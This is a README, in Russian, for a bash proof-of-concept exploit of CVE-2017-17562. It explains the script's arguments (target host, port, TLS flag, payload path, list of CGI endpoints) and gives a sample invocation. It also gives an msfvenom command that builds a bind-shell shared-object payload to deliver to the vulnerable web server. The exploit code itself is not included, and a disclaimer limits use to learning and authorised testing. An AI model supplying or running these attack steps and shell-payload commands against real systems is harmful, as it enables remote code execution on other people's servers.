
PoC для CVE-2017-17562, написанный на bash
Реализация PoC на Bash для CVE-2017-17562.
Требуется curl для создания HTTP-запросов.
Основано на реализациях Metasploit и @fssecur3.
Следующие аргументы обязательны для разведки и отправки полезной нагрузки:
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine
Опционально можно также задать следующие аргументы:
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
Данный код предназначен только для обучения и демонстрации. Не используйте его для целей, на которые у вас нет разрешения.
В этом репозитории не предоставляются полезные нагрузки (payloads). Однако любой бинарный файл, соответствующий архитектуре ОС цели, должен работать. Для создания полезной нагрузки bind shell вы можете использовать msfvenon:
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so